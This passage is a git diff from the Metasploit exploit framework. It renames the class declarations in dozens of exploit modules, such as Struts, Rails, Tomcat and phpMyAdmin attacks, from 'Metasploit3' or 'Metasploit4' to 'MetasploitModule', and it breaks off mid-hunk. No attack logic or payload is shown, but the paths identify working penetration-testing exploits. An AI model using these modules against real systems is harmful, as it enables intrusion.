Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/phpldapadmin_query_engine.rb b/modules/exploits/multi/http/phpldapadmin_query_engine.rb index f4a13ff765..662214c355 100644 --- a/modules/exploits/multi/http/phpldapadmin_query_engine.rb +++ b/modules/exploits/multi/http/phpldapadmin_query_engine.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/phpmoadmin_exec.rb b/modules/exploits/multi/http/phpmoadmin_exec.rb index 7c6bcd0db1..48e01b6851 100644 --- a/modules/exploits/multi/http/phpmoadmin_exec.rb +++ b/modules/exploits/multi/http/phpmoadmin_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb b/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb index 07e724ebec..3d4ef14bc7 100644 --- a/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb +++ b/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/http/phpmyadmin_preg_replace.rb b/modules/exploits/multi/http/phpmyadmin_preg_replace.rb index f08271cfe8..c2a6c602d5 100644 --- a/modules/exploits/multi/http/phpmyadmin_preg_replace.rb +++ b/modules/exploits/multi/http/phpmyadmin_preg_replace.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/phpscheduleit_start_date.rb b/modules/exploits/multi/http/phpscheduleit_start_date.rb index 1cb52422ab..567b014c8c 100644 --- a/modules/exploits/multi/http/phpscheduleit_start_date.rb +++ b/modules/exploits/multi/http/phpscheduleit_start_date.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/phptax_exec.rb b/modules/exploits/multi/http/phptax_exec.rb index 298234721b..b9d2ab419a 100644 --- a/modules/exploits/multi/http/phptax_exec.rb +++ b/modules/exploits/multi/http/phptax_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/phpwiki_ploticus_exec.rb b/modules/exploits/multi/http/phpwiki_ploticus_exec.rb index 2eed181293..63d2cd6da9 100644 --- a/modules/exploits/multi/http/phpwiki_ploticus_exec.rb +++ b/modules/exploits/multi/http/phpwiki_ploticus_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/plone_popen2.rb b/modules/exploits/multi/http/plone_popen2.rb index 85ae5364aa..fddf70ee17 100644 --- a/modules/exploits/multi/http/plone_popen2.rb +++ b/modules/exploits/multi/http/plone_popen2.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/pmwiki_pagelist.rb b/modules/exploits/multi/http/pmwiki_pagelist.rb index 69eaf74d1e..e0ddb9bc03 100644 --- a/modules/exploits/multi/http/pmwiki_pagelist.rb +++ b/modules/exploits/multi/http/pmwiki_pagelist.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/polarcms_upload_exec.rb b/modules/exploits/multi/http/polarcms_upload_exec.rb index ee5adbdc09..68596ebef7 100644 --- a/modules/exploits/multi/http/polarcms_upload_exec.rb +++ b/modules/exploits/multi/http/polarcms_upload_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/processmaker_exec.rb b/modules/exploits/multi/http/processmaker_exec.rb index 9a7f37a6ca..da859cb3f4 100644 --- a/modules/exploits/multi/http/processmaker_exec.rb +++ b/modules/exploits/multi/http/processmaker_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/qdpm_upload_exec.rb b/modules/exploits/multi/http/qdpm_upload_exec.rb index ad3841acbc..ff4b154ed1 100644 --- a/modules/exploits/multi/http/qdpm_upload_exec.rb +++ b/modules/exploits/multi/http/qdpm_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb index a8da7d1553..14598f3398 100644 --- a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb +++ b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/rails_secret_deserialization.rb b/modules/exploits/multi/http/rails_secret_deserialization.rb index 9aa9b8e633..c2da81e843 100644 --- a/modules/exploits/multi/http/rails_secret_deserialization.rb +++ b/modules/exploits/multi/http/rails_secret_deserialization.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking #Helper Classes copy/paste from Rails4 diff --git a/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb b/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb index 29e4072bd1..c6a7904b59 100644 --- a/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb +++ b/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/rocket_servergraph_file_requestor_rce.rb b/modules/exploits/multi/http/rocket_servergraph_file_requestor_rce.rb index 29d59a6453..50cf328ac9 100644 --- a/modules/exploits/multi/http/rocket_servergraph_file_requestor_rce.rb +++ b/modules/exploits/multi/http/rocket_servergraph_file_requestor_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/sflog_upload_exec.rb b/modules/exploits/multi/http/sflog_upload_exec.rb index bc898098c3..e9f198bd6c 100644 --- a/modules/exploits/multi/http/sflog_upload_exec.rb +++ b/modules/exploits/multi/http/sflog_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/simple_backdoors_exec.rb b/modules/exploits/multi/http/simple_backdoors_exec.rb index 4b23877fda..0725b0f74f 100644 --- a/modules/exploits/multi/http/simple_backdoors_exec.rb +++ b/modules/exploits/multi/http/simple_backdoors_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/sit_file_upload.rb b/modules/exploits/multi/http/sit_file_upload.rb index f854d6483b..92568c6f94 100644 --- a/modules/exploits/multi/http/sit_file_upload.rb +++ b/modules/exploits/multi/http/sit_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/snortreport_exec.rb b/modules/exploits/multi/http/snortreport_exec.rb index 077c327a73..d4de32cf5c 100644 --- a/modules/exploits/multi/http/snortreport_exec.rb +++ b/modules/exploits/multi/http/snortreport_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/http/solarwinds_store_manager_auth_filter.rb b/modules/exploits/multi/http/solarwinds_store_manager_auth_filter.rb index c2b3a72a7b..4735a2872e 100644 --- a/modules/exploits/multi/http/solarwinds_store_manager_auth_filter.rb +++ b/modules/exploits/multi/http/solarwinds_store_manager_auth_filter.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/sonicwall_gms_upload.rb b/modules/exploits/multi/http/sonicwall_gms_upload.rb index c1fd88b671..2f9e672522 100644 --- a/modules/exploits/multi/http/sonicwall_gms_upload.rb +++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/multi/http/splunk_mappy_exec.rb b/modules/exploits/multi/http/splunk_mappy_exec.rb index c23d9b5a41..c96fe4d48d 100644 --- a/modules/exploits/multi/http/splunk_mappy_exec.rb +++ b/modules/exploits/multi/http/splunk_mappy_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/splunk_upload_app_exec.rb b/modules/exploits/multi/http/splunk_upload_app_exec.rb index 20066ea72b..6d574aeaaf 100644 --- a/modules/exploits/multi/http/splunk_upload_app_exec.rb +++ b/modules/exploits/multi/http/splunk_upload_app_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/spree_search_exec.rb b/modules/exploits/multi/http/spree_search_exec.rb index 9c17ad00f3..832cef2473 100644 --- a/modules/exploits/multi/http/spree_search_exec.rb +++ b/modules/exploits/multi/http/spree_search_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/spree_searchlogic_exec.rb b/modules/exploits/multi/http/spree_searchlogic_exec.rb index 49b6c061b4..857c460402 100644 --- a/modules/exploits/multi/http/spree_searchlogic_exec.rb +++ b/modules/exploits/multi/http/spree_searchlogic_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/struts_code_exec.rb b/modules/exploits/multi/http/struts_code_exec.rb index a629668198..692c8b44b8 100644 --- a/modules/exploits/multi/http/struts_code_exec.rb +++ b/modules/exploits/multi/http/struts_code_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::CmdStager diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb index 479ce0f89f..4893376653 100644 --- a/modules/exploits/multi/http/struts_code_exec_classloader.rb +++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking # It's going to manipulate the Class Loader include Msf::Exploit::FileDropper diff --git a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb index 83a47cb405..108963ebf6 100644 --- a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb +++ b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::CmdStager diff --git a/modules/exploits/multi/http/struts_code_exec_parameters.rb b/modules/exploits/multi/http/struts_code_exec_parameters.rb index e9e568a9ee..8fc53b6155 100644 --- a/modules/exploits/multi/http/struts_code_exec_parameters.rb +++ b/modules/exploits/multi/http/struts_code_exec_parameters.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/struts_default_action_mapper.rb b/modules/exploits/multi/http/struts_default_action_mapper.rb index af4acfdf6a..dc6ddf026c 100644 --- a/modules/exploits/multi/http/struts_default_action_mapper.rb +++ b/modules/exploits/multi/http/struts_default_action_mapper.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/struts_dev_mode.rb b/modules/exploits/multi/http/struts_dev_mode.rb index 856973c841..51101ea197 100644 --- a/modules/exploits/multi/http/struts_dev_mode.rb +++ b/modules/exploits/multi/http/struts_dev_mode.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/struts_include_params.rb b/modules/exploits/multi/http/struts_include_params.rb index 555d03f990..14f272491c 100644 --- a/modules/exploits/multi/http/struts_include_params.rb +++ b/modules/exploits/multi/http/struts_include_params.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/stunshell_eval.rb b/modules/exploits/multi/http/stunshell_eval.rb index 6612a08732..e6df8bb6b2 100644 --- a/modules/exploits/multi/http/stunshell_eval.rb +++ b/modules/exploits/multi/http/stunshell_eval.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/stunshell_exec.rb b/modules/exploits/multi/http/stunshell_exec.rb index 33e003d6bd..452faf5481 100644 --- a/modules/exploits/multi/http/stunshell_exec.rb +++ b/modules/exploits/multi/http/stunshell_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/sun_jsws_dav_options.rb b/modules/exploits/multi/http/sun_jsws_dav_options.rb index 4ef79cf5fa..9601ddd0bd 100644 --- a/modules/exploits/multi/http/sun_jsws_dav_options.rb +++ b/modules/exploits/multi/http/sun_jsws_dav_options.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/http/client' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/sysaid_auth_file_upload.rb b/modules/exploits/multi/http/sysaid_auth_file_upload.rb index 2d879862d2..50eed593b7 100644 --- a/modules/exploits/multi/http/sysaid_auth_file_upload.rb +++ b/modules/exploits/multi/http/sysaid_auth_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb b/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb index d2ecb468b3..1fe9f34dd9 100644 --- a/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb +++ b/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/testlink_upload_exec.rb b/modules/exploits/multi/http/testlink_upload_exec.rb index b5096db680..1ef14c565f 100644 --- a/modules/exploits/multi/http/testlink_upload_exec.rb +++ b/modules/exploits/multi/http/testlink_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/tomcat_mgr_deploy.rb b/modules/exploits/multi/http/tomcat_mgr_deploy.rb index 75c6beda9c..8bcde06e80 100644 --- a/modules/exploits/multi/http/tomcat_mgr_deploy.rb +++ b/modules/exploits/multi/http/tomcat_mgr_deploy.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] } diff --git a/modules/exploits/multi/http/tomcat_mgr_upload.rb b/modules/exploits/multi/http/tomcat_mgr_upload.rb index 1098c9140f..802cb21512 100644 --- a/modules/exploits/multi/http/tomcat_mgr_upload.rb +++ b/modules/exploits/multi/http/tomcat_mgr_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] } diff --git a/modules/exploits/multi/http/traq_plugin_exec.rb b/modules/exploits/multi/http/traq_plugin_exec.rb index 7c972720cb..a5caeffc82 100644 --- a/modules/exploits/multi/http/traq_plugin_exec.rb +++ b/modules/exploits/multi/http/traq_plugin_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/uptime_file_upload_1.rb b/modules/exploits/multi/http/uptime_file_upload_1.rb index 7647d7b20d..e50a1ce5aa 100644 --- a/modules/exploits/multi/http/uptime_file_upload_1.rb +++ b/modules/exploits/multi/http/uptime_file_upload_1.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/uptime_file_upload_2.rb b/modules/exploits/multi/http/uptime_file_upload_2.rb index 71fe60d2a0..ebcee62cd3 100644 --- a/modules/exploits/multi/http/uptime_file_upload_2.rb +++ b/modules/exploits/multi/http/uptime_file_upload_2.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'nokogiri' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::PhpEXE diff --git a/modules/exploits/multi/http/v0pcr3w_exec.rb b/modules/exploits/multi/http/v0pcr3w_exec.rb index 1c94eb7118..c8c5958069 100644 --- a/modules/exploits/multi/http/v0pcr3w_exec.rb +++ b/modules/exploits/multi/http/v0pcr3w_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/vbseo_proc_deutf.rb b/modules/exploits/multi/http/vbseo_proc_deutf.rb index be7f303cd8..081b7421fc 100644 --- a/modules/exploits/multi/http/vbseo_proc_deutf.rb +++ b/modules/exploits/multi/http/vbseo_proc_deutf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/vbulletin_unserialize.rb b/modules/exploits/multi/http/vbulletin_unserialize.rb index 15f48e6c1a..a9183cdb48 100644 --- a/modules/exploits/multi/http/vbulletin_unserialize.rb +++ b/modules/exploits/multi/http/vbulletin_unserialize.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/visual_mining_netcharts_upload.rb b/modules/exploits/multi/http/visual_mining_netcharts_upload.rb index 88d5e8285f..7120fa3926 100644 --- a/modules/exploits/multi/http/visual_mining_netcharts_upload.rb +++ b/modules/exploits/multi/http/visual_mining_netcharts_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/vtiger_install_rce.rb b/modules/exploits/multi/http/vtiger_install_rce.rb index 3e76c223bf..46076f32c4 100644 --- a/modules/exploits/multi/http/vtiger_install_rce.rb +++ b/modules/exploits/multi/http/vtiger_install_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote # Application database configuration is overwritten Rank = ManualRanking diff --git a/modules/exploits/multi/http/vtiger_php_exec.rb b/modules/exploits/multi/http/vtiger_php_exec.rb index 92472d92bd..1ab8da5768 100644 --- a/modules/exploits/multi/http/vtiger_php_exec.rb +++ b/modules/exploits/multi/http/vtiger_php_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/vtiger_soap_upload.rb b/modules/exploits/multi/http/vtiger_soap_upload.rb index 6769172a7a..89f2684aed 100644 --- a/modules/exploits/multi/http/vtiger_soap_upload.rb +++ b/modules/exploits/multi/http/vtiger_soap_upload.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include REXML diff --git a/modules/exploits/multi/http/webpagetest_upload_exec.rb b/modules/exploits/multi/http/webpagetest_upload_exec.rb index 8531ee69dc..4ad2b196c1 100644 --- a/modules/exploits/multi/http/webpagetest_upload_exec.rb +++ b/modules/exploits/multi/http/webpagetest_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/werkzeug_debug_rce.rb b/modules/exploits/multi/http/werkzeug_debug_rce.rb index 4ec74e7e02..10ebc7548f 100644 --- a/modules/exploits/multi/http/werkzeug_debug_rce.rb +++ b/modules/exploits/multi/http/werkzeug_debug_rce.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/multi/http/wikka_spam_exec.rb b/modules/exploits/multi/http/wikka_spam_exec.rb index 18503fd504..6c5bc618a3 100644 --- a/modules/exploits/multi/http/wikka_spam_exec.rb +++ b/modules/exploits/multi/http/wikka_spam_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/x7chat2_php_exec.rb b/modules/exploits/multi/http/x7chat2_php_exec.rb index 4bbe7f9e23..ef9c0d12c8 100644 --- a/modules/exploits/multi/http/x7chat2_php_exec.rb +++ b/modules/exploits/multi/http/x7chat2_php_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/zabbix_script_exec.rb b/modules/exploits/multi/http/zabbix_script_exec.rb index de4afd7a6a..f30690cf58 100644 --- a/modules/exploits/multi/http/zabbix_script_exec.rb +++ b/modules/exploits/multi/http/zabbix_script_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/zemra_panel_rce.rb b/modules/exploits/multi/http/zemra_panel_rce.rb index 57fdaadb76..5f6fb39320 100644 --- a/modules/exploits/multi/http/zemra_panel_rce.rb +++ b/modules/exploits/multi/http/zemra_panel_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/zenworks_configuration_management_upload.rb b/modules/exploits/multi/http/zenworks_configuration_management_upload.rb index b22c77322b..5bba09e754 100644 --- a/modules/exploits/multi/http/zenworks_configuration_management_upload.rb +++ b/modules/exploits/multi/http/zenworks_configuration_management_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/zenworks_control_center_upload.rb b/modules/exploits/multi/http/zenworks_control_center_upload.rb index f82eb98b9a..0abf38123e 100644 --- a/modules/exploits/multi/http/zenworks_control_center_upload.rb +++ b/modules/exploits/multi/http/zenworks_control_center_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/multi/http/zpanel_information_disclosure_rce.rb b/modules/exploits/multi/http/zpanel_information_disclosure_rce.rb index 9fa8a71709..18fe64bc64 100644 --- a/modules/exploits/multi/http/zpanel_information_disclosure_rce.rb +++ b/modules/exploits/multi/http/zpanel_information_disclosure_rce.rb @@ -8,7 +8,7 @@ require 'msf/core/exploit/php_exe' require 'nokogiri' require 'uri' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper diff --git a/modules/exploits/multi/ids/snort_dce_rpc.rb b/modules/exploits/multi/ids/snort_dce_rpc.rb index 04491e6dc0..75656d28c7 100644 --- a/modules/exploits/multi/ids/snort_dce_rpc.rb +++ b/modules/exploits/multi/ids/snort_dce_rpc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Capture diff --git a/modules/exploits/multi/misc/arkeia_agent_exec.rb b/modules/exploits/multi/misc/arkeia_agent_exec.rb index 5f709764b8..7e0ddefcb7 100644 --- a/modules/exploits/multi/misc/arkeia_agent_exec.rb +++ b/modules/exploits/multi/misc/arkeia_agent_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/misc/batik_svg_java.rb b/modules/exploits/multi/misc/batik_svg_java.rb index e1b3ec975e..86db120167 100644 --- a/modules/exploits/multi/misc/batik_svg_java.rb +++ b/modules/exploits/multi/misc/batik_svg_java.rb @@ 